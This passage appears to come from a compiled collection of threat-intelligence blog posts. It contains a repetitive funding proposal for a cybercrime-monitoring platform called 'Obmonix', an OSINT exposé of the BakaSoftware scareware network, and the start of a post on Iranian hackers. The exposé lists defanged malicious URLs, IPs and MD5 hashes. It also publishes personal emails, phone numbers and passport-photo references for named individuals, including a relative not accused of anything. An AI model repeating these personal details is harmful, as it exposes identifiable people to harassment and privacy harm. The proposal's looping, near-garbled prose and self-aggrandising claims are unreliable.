originating for Iran, Pakistan, Saudi Arabia, Iraq, and Syria including the automated processing and interaction

with mobile malware

• The appliance is capable of maintaining detailed information leading to the production of quality real-time,

actionable intelligence type of reports for malicious software phishing and social engineering data type of origin

sources for Iran, Pakistan, Saudi Arabia, Iraq and Syria

The Blue Coat Malware Analysis would ensure the automated and real-time acquisition of malicious software

phishing and social engineering type of research and analysis type of research for the purpose of ensuring the active

and real-time acquisition of malicious software phishing and social engineering research type of activity originating

in these sources.

• Vormetric encryption appliance
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Key points:

• The encryption appliance would ensure the real-time data storage of the research and analysis type of research

and analysis type of data to ensure the availability confidentiality and integrity of the data for the purpose of

producing actionable real-time intelligence based type of research and analysis reports type of research and

analysis data.

• The encryption appliance would ensure the active real-time storage of the actionable and real-time delivered

type of research and analysis type of data allowing the efficient and systematic and automated research and

analysis type of research report data to be processed and analyzed.

The encryption appliance would ensure that the platform operator is properly empowered with the necessary data

techniques and technologies to properly act upon analyze and respond to cybercrime and cyber jihad events globally.

• Barracuda Web Application appliance

Key points:

• The Web application appliance would allow the automated secure use of the robot system allowing the system-

atic real-time data acquisition on various jihadst sources

• The Web application appliance would ensure the automated and efficient use of the robot in a secure fashion

allowing the production of real-time actionable intelligence allowing the production of research and analysis

based type of research and analysis type of, data.

The Web application appliance would ensure that the operator is properly empowered with the necessary data

techniques and technologies to properly act upon analyze and respond to cybercrime and cyber jihad events globally.

• Checkpoint DDoS Protector
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Key points:

• The appliance is capable of preventing exposure of the network assets utilized by the network resulting poten-

tially resulting in the exposure of the availability confidentiality and integrity of the information

• The appliance is capable of ensuring the real-time automated and persistent availability and integrity and con-

fidentiality of the information

The Checkpoint DDoS Protector would ensure the constant availability of the network infrastructure utilized in this

project potentially preventing compromise of the network assets resulting in improved productivity and realization

of various project objectives.

• Encryption appliance

Key points:

• The encryption appliance is capable of ensuring the confidentiality integrity and availability of the information

• The encryption appliance is capable of distinguishing between multiple networks further ensuring a closed

network type of network access

The encryption appliance would ensure that the maximum possible secure measures are currently in place further

ensuring that access to the closed restricted network remains as private as possible ensuring the confidentiality

integrity and availability of the information to further ensure the active real-time intelligence based real-time type of

research and analysis type of research and analysis type of data.

• Cisco Catalyst

218





Key points:

• The appliance is capable of ensuring the real-time and automated use of the network equipment necessary to

maintain the active infrastructure to ensure that it’s operating in an automated and efficient fashion

Cisco Catalyst is a network equipment allowing the efficient productivity type of interconnection between all the

platforms and network equipment used in this project.

• Kapow appliance

Key points:

• The appliance is capable of processing hundreds of thousands of Web sites on a daily basis ensuring the au-

tomated processing and analysis of jihadist communities allowing the automation of the monitoring process

to further enhance the produced actionable intelligence leading to a research and analysis produced type of

research and analysis type of data.

• The appliance is capable of monitoring and establishing the foundations for real-time monitoring and analysis

of jihadist communities for the purpose of producing actionable real-time intelligence research and analysis

type of research and analysis data.
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• The appliance is capable of processing multiple jihadist forum communities for the purpose of establishing the

foundations for successful real-time actionable intelligence producing research and analysis type of research

and analysis data.

The analysis appliance would ensure timely and real-time access to current and historical intelligence data in regard

to jihadist activities online,through the systematic automated and real-time data acquisition from a variety of public

and closed sources for the purpose of setting up the foundations for a successful data source leading to a successful

analysis and research type of analysis activities.

• Appliance router

Key points:

• The appliance router would ensure the constant and real-time availability of the network assets for the purpose

of active and timely acquisition of actionable real-time research and analysis type of research and analysis report

type of research and analysis network assets availability.

The purpose of the appliance router would be to ensure real-time connectivity with a variety of platforms to ensure

that the operator is properly empowered with the necessary data techniques and technologies to properly act upon

analyze and respond to cybercrime and cyber jihad events globally.

• Analytics appliance
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Key points:

• the analytics appliance would be capable of performing real-time assessment of cybercrime and cyber jihad

events globally and will ultimately empower the Obmonix platform operator with the necessary data informa-

tion and knowledge to act upon prevent and respond to cybercrime and cyber jihad events globally

The purpose of the appliance would be to empower the operator with the necessary data information and knowledge

to act upon react to and respond to various cybercrime and cyber jihad events globally.

• Rosette appliance

Key points:

• The localization appliance will ultimately empower the Obmonix platform operator with the necessary data

information and knowledge to act upon respond to and prevent widespread damage while analyzing cybercrime

and cyber jihad events globally.

The purpose of the localization appliance would be to empower the Obmonix platform operator with the necessary

data information and knowledge to act upon respond to and prevent widespread damage provoked by cybercrime

and cyber jihad events globally.

• Systran appliance
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Key points:

• The Systran appliance will ultimately empower the operator with the necessary data information and knowledge

to act upon respond to and prevent widespread damage while analyzing cybercrime and cyber jihad events

globally.

The purpose of the Systran appliance would be to empower the Obmonix platform operator with the necessary data

information and knowledge to act upon respond to and prevent widespread damage provoked by cybercrime and

cyber jihad events globally.

Funding Phase

The initial funding phrase will consist of active acquisition of assets for the purpose of obtaining access to

industry leading and proprietary selected providers of threat intelligence for the purpose of establishing the

foundations for an active sensors network type of cybercrime/cyber jihad monitor sensor network type of data. The

initial stage will consist of obtaining assets for the purpose of obtaining access to industry leading and proprietary

selected equipment for the purpose of setting the foundations for a successful sensor network based type of data.

The initial phase will consist of active purchase of the following equipment: FortiSandbox, Blue Coat Malware

Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco Catalyst, Vormetric encryption appliance, including the following

subscription-based type of threat intelligence gathering data - Team Cumry, threat, data, feed, Kaspersky, threat,

data, feed, Abusix, threat, data, feed, MalwarePatrol, threat, data, feed, Sophos, threat, data, feed, OPSWAT, Abusix,

Threat, Feed, Threat, Feed, ProjectHoneypot, threat, data, feed.

- Kaspersky Data Feed

- Sophos Data Feed

- Team Cumry Data Feed

- MalwarePatrol Data Feed

- Abusix Data Feed

- LookingGlass Data Feed

- Cyren Data Feed

- Symantec Data Feed

- VirusTotal Data Feed
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- ProjectHoneypot Data Feed

The second funding phase will consist of active acquisition of honeypot appliance including active netblock

purchase within a dedicated set of countries for the purpose of establishing the foundations of an active sensor

network type of data-acquisition activities. The second funding phase will consist of active acquisition of the following

proprietary appliances: Honeybox Enterprise, honeybox SCADA, including netblocks within the following countries,

The third funding phase will consist of active purchase of service and solution-based appliance, including data-

processing appliance, including localization appliance, for the purpose of setting up the foundations for the Obmonix

platform successfully empowering its operator with the necessary data and expertise for the purpose of actively

responding to global cybercrime and jihad events.

The third funding phase will consist of active purchase of the following appliances: Kapow Software, Rosette

appliance, Systran appliance, Sentinel appliance, Palantir appliance.

The fourth funding phase will consist of active purchase of the World’s most popular solution-oriented portal

for Information Security - Expedited Entry Into the Cyber Warfare Realm – a Pro-U.S Based Offensive and Asymmet-

ric Cyber Warfare Practical Trends Application Big Data and Research-Centered R &D Platform - further ensuring

successfully and ongoing commercilization including the active acquisition of client-base, including the establishing

of the World’s largest endpoint based sensor network for tracking and responding to cybercrime and jihad events

globally.

Dancho Danchev will build a pro-U.S offensive and asymmetric cyber warfare program that will inevitably dive

deep into the Cyber Warfare realm and will produce what can be best described as the U.S primary source for

offensive and asymmetric cyber warfare information repository and data-information on current and future trends

and provide the foundations for a successful R &D cyber warfare partnership with millions of loyal Pro-Western

cyber warriors and researchers globally positioning the platform as the leading think-tank for practical and relevant

cyber warfare power including the World’s leading Pro-Western Cyber Warfare Research and Development research

program center.

With the U.S attempting to tackle the country’s perceived and outdated Mis-understanding of Cyber Warfare

in Today’s Modern Russia China and Iran dominated Cyber Warfare Realm including the ongoing shortage of

recruitment and relatively outdated and not necessary dynamic HR-management pool of hundreds of thousands of

Pro-U.S Cyber Warriors the platform ultimately empower the re-position the U.S as the dominant Cyber Warfare

power by providing actionable think-tank type of proactive and actionable Cyber Warfare insight including the active

and permanent recruitment of millions of Pro-U.S Cyber Warriors further supporting the U.S’s mission on its way to

dominate and launch offensive and defensive cyber missions and related research attacks.

The project will conduct what can be best described as the most comprehensive study and analysis to the
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United States out-dated understanding of the Cyber Warfare realm and provide actionable and practical insight including a production-ready HR-management and Big Data driven Cyber Warfare platform successfully disrupting

international cybercrime networks conducting economic terrorism infiltrating the vibrant cyber-crime and cyber jihad

international community and successfully recruiting millions of Pro-U.S Cyber Warriors. The First Stage of the project

would ensure that the foundations for a successful invite-only Pro-U.S Cyber Warfare community have already been

established through the direct launching and operation of the World’s Largest and Proprietary Invite-Only Pro-U.S

Cyber Warfare Forum Community.

Associated deliverables will include: the World’s largest search engine for security information, the World’s

most vibrant community for security job search, the World’s most vibrant proprietary community for sharing dissem-

inating communicating and enriching security data, the World’s most comprehensive sensor network for observing

disseminating and responding to global cybercrime-events, the release of community-enriched security router, the

successful release of community-enriched privacy router, the development and release of community-enriched

public threat feed, the release of community-enriched private threat feed, including, proprietary threat feed, targeted

threat intelligence on demand type of research and analysis producing solution, proprietary bug bounty solution,

hacking and security-oriented online radio, hacking and security-oriented E-zine, hacking and security-oriented

videocast, on-demand penetration testing and offensive team consulting, on-demand Web site monitoring for

security events, OEM partnership capabilities, custom-build anti-virus scanner capabilities.

Community Industry Reference

The contractor Dancho Danchev is an internationally recognized cybercrime researcher security blogger and threat

intelligence analyst in the field of cybercrime research having successfully contributed to the overall demise of

cybercrime internationally throughout the past decade having successfully pioneered a variety of threat intelligence

gathering methodologies leading him to a successful, pursued of high profile nation-state actors and malicious actors

across the globe leading him to a successful pursued of high-profile nation-state actors and malicious adversaries

across the globe the researcher successfully launched a newly launched startup named Disruptive Individuals aiming

to disrupt the undermine the international cybercrime and cyber-jihad ecosystem globally.

Statement of Work (SOW)

01. Vendor contact - the initial stage of the project will consist of direct contact between industry leading commercial

security appliance providers further requesting pricing and shipping details including a “point-of-contact”.

• Possible deliverables consisting of the initial stage include industry-leading security appliance - FortiMail, Blue

Coat Malware Analysis. FortiSandbox, Vormetric encryption appliance, Barracuda Web Application appliance,

Checkpoint DDoS Protector, Ethernet encryptor, Cisco Catalyst, Kapow appliance, Palantir appliance, Cisco fire-

wall appliance, Rosette appliance, Systran appliance, NAS appliance, pfSense appliance, Honeybox appliance,

Honeybox SCADA appliance.

02. Vendor netblock contact - The initial stage of the project will consist of direct contact between industry leading
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providers of netblock requesting pricing information for specific pre-defined geolocated regions of interest.

• Possible deliverables including netblock in Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina faso, Chile, China,

Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic People’s Republic of Korea, Liberia, Macao, Mal-

dives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania, Sierra Leone, Sudan, Arab Republic Syrian,

Togo, Uganda, Vanuatu, Yemen.

03. Vendor threat data contact - the initial stage of the project will consist of direct contact between industry-leading

including a selected set of threat data providers requesting pricing information including possible partnership

opportunity.

• Possible deliverables including Team Cumry threat data feed Kaspersky threat data feed, Abusix threat data

feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT, Abusix Threat Feed, ProjectHoneypot

threat data feed.

04. Secure location foundation - the initial stage of the project will consist of direct evaluation of the infrastructure

required for the secure location including direct contact between security vendors to ensure a secure location.

• Possible, deliverables, include, military-grade, fence, surveillance, security, guard.

05. Vendor connection contact - the initial stage of the project will consist of direct contact between vendor to

ensure that the infrastructure is properly secured ensuring a timely and secure infrastructure.

• Possible deliverables include direct connection.

06. Secure work environment - the initial stage of the project will consist of direct evaluation including a direct

purchase of a work terminal to ensure a smooth and secure work environment

• Possible deliverables including RF shielding, SEL SP–157, FSPK-10, SEL SP-113 "Blockade".

07. Secure work environment - the initial stage of the project will consist of direct evaluation including a direct

purchase of equipment related to secure work environment to ensure a smooth and secure work environment.

• Possible deliverables including Cisco Firepower ASA, CheckPoint Threat appliance, Nova network appliance,

Fortinet security appliance, Dell Soho network, security appliance.

The contractor Dancho, Danchev is one of the world’s leading experts in the field of cybercrime research and threat

intelligence gathering having successfully tracked monitored and profiled high-profile nation-state and malicious

actors type of fraudulent activity over the past decade having successfully pioneered and established a direct

connection with some of the world’s leading providers of threat intelligence gathering.

The contractor’s initial goal for the purpose of the Obmonix platform would be to achieve the world’s largest
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and most comprehensive sensor type of network for monitoring profiling and keeping track of nation-state malicious-actors type of fraudulent and malicious activity.

The project main base would be located in a discreet location in Sofia Bulgaria. The contractor would eventu-

ally ensure that active RF shielding including basic physical security measures are taken in place including active

surveillance military-grade fence and an associated security guard are in place for the purpose of establishing the

foundation of a secure work environment.

The Obmonix platform aims to build the World’s most versatile and comprehensive sensor network for inter-

cepting monitoring and responding to cybercrime and cyber jihad events successfully deploying a variety of

proprietary sensor network based of honeypot appliances industry-wide partnership including the utilization of

proprietary cybercrime and cyber jihad forum and community monitoring and infiltration campaigns successfully

positioning the platform as the leading indicator for cybercrime and cyber jihad activity globally.

Cost Proposal - Detailed Project Information

01. Equipment cost - The Obmonix platform will ultimately rely on the following equipment cost for the purpose of

establishing the foundations for the Obmonix platform.

• FortiMail

• FortiSandbox

• Blue Coat Malware Analysis

• Vormetric encryption appliance

• Checkpoint DDoS Protector

• Encryption appliance

• Cisco Catalyst

• Kapow appliance

• Appliance router

• Analytics appliance

• Infoblox Trinzic 1420

• Nova network security

• Cisco firewall appliance

• IllusionBlack Framework

• Rosette appliance

• Systran appliance
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• NAS appliance

• pfSense

• Honeybox appliance

• Honeybox SCADA appliance

• Network equipment

Detailed Project Funding Phase Information

01. The initial funding phrase will consist of active acquisition of assets for the purpose of obtaining access to industry

leading and proprietary selected providers of threat intelligence for the purpose of establishing the foundations for

an active sensors network type of cybercrime/cyber jihad monitor sensor network type of data. The initial stage

will consist of obtaining assets for the purpose of obtaining access to industry leading and proprietary selected

equipment for the purpose of setting the foundations for a successful sensor network based type of data.

• The initial phase will consist of active purchase of the following equiptment: FortiSandbox, Blue Coat Malware

Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco Catalyst, Vormetric encryption appliance, including the

following subscription-based type of threat intelligence gathering data - Team Cumry threat data feed, Kaspersky

threat data feed, Abusix,threat data feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT,

Abusix Threat Feed, ProjectHoneypot threat data feed.

Including the following Threats Feeds:

• Kaspersky Data Feed

• Sophos Data Feed

• Jigsaw Threat Data Feed

• IBM X-Force Exchange

• Team Cumry Data Feed

• Proofpoint Threat Feed

• NetSTAR Data Feed

• RiskIQ Data Feed

• ESET Data Feed

• Pixalate Data Feed

• MalwarePatrol Data Feed

• Abusix Data Feed

• Massive Data Feed

• PhishLabs Data Feed

• LookingGlass Data Feed
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• Blueliv Data Feed

• Mnemonic Data Feed

• Cyren Data Feed

• ADMINUSLabs Data Feed

• NSFOCUS Data Feed

• Webroot Data Feed

• Symantec Data Feed

• VirusTotal Data Feed

• ProjectHoneypot Data Feed

02. The second funding phase will consist of active acquisition of honeypot appliance including active netblock

purchase within a dedicated set of countries for the purpose of establishing the foundations of an active sensor

network type of data-acquisition activities.

• The second funding phase will consist of active acquisition of the following proprietary appliances: Honeybox

Enterprise, Infoblox Trinzic 1420, honeybox SCADA, including netblocks within a dedicated set of countries -

Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala,

Jordan, Democratic People’s Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger,

Pakistan, Poland, Romania, Sierra Leone, Sudan, Arab Republic Syrian, Togo, Uganda, Vanuatu, Yemen.

03. The third funding phase will consist of active purchase of service and solution-based appliance, including

data-processing appliance, including localization appliance, for the purpose of setting up the foundations for the

Obmonix platform successfully empowering its operator with the necessary data and expertise for the purpose of

actively responding to global cybercrime and jihad events.

• The third funding phase will consist of active purchase of the following appliances: Kapow Software, Rosette

appliance, Systran appliance, Sentinel appliance, Palantir appliance.

In case you’re interested in working with me for the purpose of implementing this project including possible investor

introduction - I can be reached at dancho.danchev@hush.com

1. http://www.dia.mil/Business/Needipedia/

2. https://www.srf.org/
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Who’s Behind BakaSoftware? - OSINT Analysis (2019-01-15 18:32)

Remember [1]BakaSoftware? The ubiquitous scareware-serving and distributing money laundering scareware

affiliate-based network circa 2008? It appears that the time has come to expose the actual individuals behind the

campaign and the actual network.

In this analysis I’ll discuss in depth the BakaSoftware franchise circa 2008 including in-depth and personally

identifiable information on the cybercriminals behind it with the idea to empower law enforcement and the security

industry with the necessary data and information that would eventually lead to the prosecution and tracking down

of the cybercriminals behind BakaSoftware.

I can be reached at dancho.danchev@hush.com

Personal Photo of Gavril Danilkin - Founder and CEO of BakaSoftware:

Second Personal Photo of Gavril Danilkin - Founder and CEO of BakaSoftware:

231



Personally Identifiable Information regarding BakaSoftware’s Founder and CEO - Gavril Danilkin:

Name: Gavril Danilkin

Email: gavril@penza.net; fido@penza.net; doncapone@mail.ru; gav ril@sura.com.ru;

Mobile Phone: 8412631806; 89023537746; 841251-06-02; 841256-49-45; 841276-06-93

Skype: BakaDialer

Web Site: http://penza-stroika.narod.ru

BakaSoftware Social Network Visualization Graph courtesy of Maltego:
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Personal Passport Photo of Gavril Danilkin’s father Danilkin Vasily Vasilyevich:
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Second Personal Passport Photo of Gavril Danilkin’s father Danilkin Vasily Vasilyevich:
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Malicious and Fraudulent Infrastructure reconnaissance:

hxxp://bakasoftware.com - 216.240.138.200 - Email: gavril@penza.net

hxxp://ns1.bakasoftware.com - 216.255.189.139 Email: support@tobesoftware.com

hxxp://tst.bakasoftware.com - 216.255.189.155 - Email: support@tobesoftware.com

hxxp://bakasoftware.net - 208.88.227.36; 208.88.227.36 - Email: krab@thekrab.com

hxxp://bakadialer.com

Personally Identifiable Information regarding BakaSoftware - TheKrab:

Name: TheKrab

Email: marck@gmail.com

Phone: +7 012-225-5252

Web site: http://smmprofi.ru/marck

Personal Photo of a known BakaSoftware Gang Member known as - TheKrab:
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Related Personal Photo of a known BakaSoftware Gang Member known as - TheKrab:
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It gets even more interesting to find out that BakaSoftware’s Gavril Danilkin is currently running a rogue and potentially malicious rogueware and adware distributing affiliate-company known as Zaxar Limited. Let’s take the time and effort

and provide actionable intelligence on the infrastructure behind the campaign.

Related Zaxar Ltd Information:

Zaxar Limited

P.O. Box 54922,

Zip 3729,

Limassol, Cyprus

e-mail: secretary@zaxar.net

Related malicious URLs known to have participated in the campaign:

hxxp://zxrmedia.com/client/current _version6/cef _extensions.pak

hxxp://zxrmedia.com/client/current _version6/gameslist.dat

hxxp://zxrmedia.com/client/current _version6/calling.wav

hxxp://zxrmedia.com/client/current _version6/cef _100 _percent.pak

hxxp://zxrmedia.com/client/current _version6/devtools _resources.pak

hxxp://zxrmedia.com/client/current _version6/cef.pak.info

Fraudulent and malicious rogue network infrastructure reconnaissance:

hxxp://zaxargames.com - 185.82.210.27; 185.82.210.24; 185.82.210.30

hxxp://zxrmedia.com - 185.82.210.5; 185.82.210.26; 188.42.129.36; 185.82.210.29

hxxp://zaxarstore.com - 185.82.210.24

hxxp://zaxargames.com

hxxp://zaxarsearch.com

Related malicious MD5s p art of known to have participated in the campaign:

MD5: 5c60400d7663b9a3fedd93baf0156df9

MD5: 5dd18f122fbe022e6e366d79d5b2b8a0

MD5: 225802a12e3aaeb9773b681ebe96bbe7

MD5: a50ef877e6329d2851de3fd4f49b8f7a

MD5: c82f177911708cd8373f7d788ce5ef3a

MD5: 73b48b697e7e09e2325656734eaf9f48

MD5: 522cb664e0284abf055315d327ff9c6d

MD5: 225b1ab5889506d39643d736d15fe20d

MD5: 3ca8378d493d9aa1248359c44cb0eeb8

MD5: 7c897ce217b05bb1694a924afa34096c
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MD5: 73b48b697e7e09e2325656734eaf9f48

MD5: 310e8b0e4f6dbd23c74b9fec300a24f6

Related malicious MD5s known to have participated in the campaign:

MD5: 225b1ab5889506d39643d736d15fe20d

MD5: 3ca8378d493d9aa1248359c44cb0eeb8

MD5: 7b2994888fdf0c08a357cc9c600c2c4d

MD5: 5b3fcbe6f8071e9035b8810dd3b0f143

MD5: 58d9aa76eaed4710e22f835c6c71159e

MD5: 3d327881d2950c3c7d0a58ecaa15720d

MD5: 37a90a8af1dd4c6b68cd54ddb8c6d37d

MD5: 409a8c35651363ab2ba8d1d39e257d82

MD5: 605425d1dbade7c978ebdc313b6312d5

Related malicious MD5s known to have participated in the campaign:

MD5: 201cfcfb1ed6dcaf229073318c4aaf06

MD5: 8a9b2c23cc50f9798159297d300b0c46

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 36e083ae0d58cb2f342f4cb81d6af88c

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 3092c54065a78ec88122e066bccf6238

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 049684e041281f3f7c90fb75cdc70e09

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 6d5edf93c1e4a2d1e2e5777884ed326f

MD5: 8998c75fbd86bb63d4151a810ba1b4de

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

Related malicious MD5s known to have participated in the campaign:

MD5: 3ca8378d493d9aa1248359c44cb0eeb8

MD5: 58d9aa76eaed4710e22f835c6c71159e

MD5: 7b2994888fdf0c08a357cc9c600c2c4d

MD5: 5b3fcbe6f8071e9035b8810dd3b0f143

MD5: 3d327881d2950c3c7d0a58ecaa15720d

MD5: 37a90a8af1dd4c6b68cd54ddb8c6d37d
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MD5 :409a8c35651363ab2ba8d1d39e257d82

MD5 :605425d1dbade7c978ebdc313b6312d5

Related malicious MD5s known to have participated in the campaign:

MD5: dafe1c1189a6fc55800d0874ffd6567c

MD5: c66d0521a736b73bbd109dedba2da396

MD5: 6cce70d4d7280c7f3ec913217d2b3293

MD5: cab53b3a6cc7cd8c0b04e0521770b35c

MD5: f085905595f59ac025b67c3756babe99

MD5: 201cfcfb1ed6dcaf229073318c4aaf06

MD5: 41c2f3797480a1016741cbaa232da336

MD5: 6f31fd7b8de723a6e6bab77d22276e47

MD5: 0cc657e83c5a74b7edcfe0827a976d08

MD5: 3323e84cf633173db496c2f6402ffd81

MD5: 265c61469587e932f384e862a0c7065d

MD5: e9008ecb5da99d71c0541652aa6d5bc6

MD5: 26570d6bebf71373c25dbf1e53208444

MD5: e1086a5b5c504b95dda3fbd90758a429

MD5: 8998c75fbd86bb63d4151a810ba1b4de

MD5: 0743c40c4791f4cba8488a4a908f3a57

MD5: 36e083ae0d58cb2f342f4cb81d6af88c

MD5: 0357c02fc9fdeff9ad3f78876438256b

MD5: 3092c54065a78ec88122e066bccf6238

MD5: 1aed2fc8ca434c06a6ac90264634769c

MD5: ebdf43127a54c134bb3b01ce74bb5a42

MD5: 049684e041281f3f7c90fb75cdc70e09

MD5: 8a9b2c23cc50f9798159297d300b0c46

MD5: fa15abd8810b2e9349b7723b7cb1d132

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 6d5edf93c1e4a2d1e2e5777884ed326f

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 195377bef6d2b3cb5d56b387fca8ba60

Related malicious MD5s known to have participated in the campaign:

MD5: fec37b3989e590d0f3d78c6069bb0ca0

MD5: 1554933e1243dedb041fec9029ee087c

MD5: a860ed06f5d6f6ab390edfa39c59b164

255

MD5: 61032381f8fb14cac5f9da88651b45be

MD5: 4d53a34254cbc5723a5fb960fcd4a166

Related malicious MD5s known to have participated in the campaign:

MD5: 0357c02fc9fdeff9ad3f78876438256b

MD5: 201cfcfb1ed6dcaf229073318c4aaf06

MD5: 4900e194aaf35456f9b4a97e1ca38d99

MD5: 8a9b2c23cc50f9798159297d300b0c46

MD5: 2e4dc797e098104854dc555d93dd084a

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: f69ce553ed33506d82e12fabc6f7c67a

MD5: 6c1a294a9f6cb3279b68551501ca654a

MD5: fd6e30b879ea2347e1124376b5f2d1cf

Related malicious MD5s known to have participated in the campaign:

MD5: dafe1c1189a6fc55800d0874ffd6567c

MD5: c66d0521a736b73bbd109dedba2da396

MD5: 6cce70d4d7280c7f3ec913217d2b3293

MD5: cab53b3a6cc7cd8c0b04e0521770b35c

MD5: f085905595f59ac025b67c3756babe99

MD5: 201cfcfb1ed6dcaf229073318c4aaf06

MD5: 41c2f3797480a1016741cbaa232da336

MD5: 6f31fd7b8de723a6e6bab77d22276e47

MD5: 0cc657e83c5a74b7edcfe0827a976d08

MD5: 3323e84cf633173db496c2f6402ffd81

MD5: 265c61469587e932f384e862a0c7065d

MD5: e9008ecb5da99d71c0541652aa6d5bc6

MD5: 26570d6bebf71373c25dbf1e53208444

MD5: e1086a5b5c504b95dda3fbd90758a429

MD5: 8998c75fbd86bb63d4151a810ba1b4de

MD5: 0743c40c4791f4cba8488a4a908f3a57

MD5: 36e083ae0d58cb2f342f4cb81d6af88c

MD5: 0357c02fc9fdeff9ad3f78876438256b

MD5: 3092c54065a78ec88122e066bccf6238

MD5: 1aed2fc8ca434c06a6ac90264634769c

MD5: ebdf43127a54c134bb3b01ce74bb5a42
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MD5: 049684e041281f3f7c90fb75cdc70e09

MD5: 8a9b2c23cc50f9798159297d300b0c46

MD5: Pfa15abd8810b2e9349b7723b7cb1d132

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 6d5edf93c1e4a2d1e2e5777884ed326f

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 195377bef6d2b3cb5d56b387fca8ba60

Related malicious MD5s known to have participated in the campaign:

MD5: 201cfcfb1ed6dcaf229073318c4aaf06

MD5: 8a9b2c23cc50f9798159297d300b0c46

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 36e083ae0d58cb2f342f4cb81d6af88c

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 3092c54065a78ec88122e066bccf6238

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 0149de171a6530737b1ae82e9cf9b0cf

MD5: 049684e041281f3f7c90fb75cdc70e09

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

MD5: 6d5edf93c1e4a2d1e2e5777884ed326f

MD5: 8998c75fbd86bb63d4151a810ba1b4de

MD5: 1cc70f8fd134bf7f556fca762a0a8ee7

Related malicious MD5s known to have participated in the campaign:

MD5: 23e3c313658bae8632bfc3196872daf3

MD5: 225802a12e3aaeb9773b681ebe96bbe7

MD5: 23e3c313658bae8632bfc3196872daf3

MD5: 225802a12e3aaeb9773b681ebe96bbe7

MD5: b37ac11b1cba7739eedac8082be6cc51

MD5: cbefcf14b0c24201c2b8eedaaff58738

MD5: 89724cced12e644a296cf9db1190ed1f

MD5: 12cc90ab2a0a2f0c8d208823aff36ad4

MD5: b2f616daf5512b640a70d3e3cc4c019b

MD5: 7dc92f595dbf2a5073a94c2ba3a90ed6
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MD5: 25700c5457c42eb1ae5185b6f577f8e0

MD5: a236c6ab86df7738ab9a9fda53702a50

MD5: 55e705f62af72f54b8819dd504e0b793

MD5: cbefcf14b0c24201c2b8eedaaff58738

MD5: 797f1d671eb48c008aa2842cdbe28a91

MD5: cbefcf14b0c24201c2b8eedaaff58738

MD5: 93c1a7aa2885ac2b123fc16906ea01e0

MD5: b241d2a0f66a40eb07fbe0bca529e386

MD5: 244677c44af4648cea1d3142611dc4c3

MD5: 34dc108714b3fb92f41f3efac3e60ba5

MD5: 225802a12e3aaeb9773b681ebe96bbe7

MD5: f140fed5014b826c99fdd7429f8afb89

MD5: 3d02cbb7ed1c72c2df209a3342b9efed

MD5: 86f527fb98672055217428a77e337252

MD5: df393d5e0cc4cdbbd110d2a09cb42983

MD5: 894d046c09f338e657ec7828c4c69fc7

MD5: fc60d4b0fce4c4e3779762bce0f5b69d

MD5: f959e44ac691448a31c0e051fd39d2fa

MD5: 9cbe8022efc081c5ba3c1f291989277f

Related malicious MD5s known to have participated in the campaign:

MD5: e6025966d8f72a80884eb7be19d31fcb

MD5: 734a9c8b47712d396bcd1562a229517e

MD5: e6025966d8f72a80884eb7be19d31fcb

MD5: 9cbe8022efc081c5ba3c1f291989277f

Related domains known to have participated in the campaign:

hxxp://syscos15.ru

hxxp://y9807akgtzcrolb.nidetafzy.ru

hxxp://syscos19.ru

hxxp://sendme13.ru

hxxp://dysy.storial.ru

hxxp://sendme12.ru

hxxp://sendme9.ru

hxxp://sendme8.ru

hxxp://syscos30.ru

hxxp://syscos18.ru

Stay tuned!

1. https://www.secureworks.com/research/rogue-antivirus-part-2
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Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Analysis (2019-01-16 11:09) Remember my most recently published " [1]Assessing The Computer Network Operation (CNO) Capabilities of

the Islamic Republic of Iran - Report"? The report details and discusses in-depth the most prolific Iran-based

government-sponsored and tolerated hacking groups including the following groups:

- Ashiyane Digital Security Team

- Iranhack Security Team

- Iranian Datacoders Security Team

- Iran Security Team a.k.a SEPANTA Team/Iran Cyber Army 2012/2013

- IDH Security Team

- Bastan Security Team

- NOPO Digital Security Team

- Shekaf Security Team

- Mafia Hacking Team

- Iran Black Hats Team

- Delta Hacking Security Team

- Digital Boys Underground Team

- IrIst Security Team

I recently came across to [2]FBI’s Most Wanted Cybercriminals List and decided to elaborate more by provid-

ing actionable Threat Intelligence on some of the most Wanted Iranian cybercriminals with the idea to help law

enforcement and to inform the security industry and to ensure that the cybercriminals behind these campaigns can

be properly tracked down and prosecuted.

I can be reached at dancho.danchev@hush.com

In this OSINT analysis I’ll provide actionable intelligence including personally identifiable information some of

FBI’s Most Wanted Iranian cybercriminals including [3]Ahmad Fathi, [4]Hamid Firoozi, [5]Amin Shokohi, [6]Mohammad Sadegh Ahmadzadegan, [7]Omid Ghaffarinia, [8]Sina Keissar, [9]Nader Saedi including the infamous ITSec Team and the Mersad Co. company.
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Personally Identifiable Information regarding Sun Army Team Members including ITSec Team and the Mersad Co.

company:

Sun Army Team Members:

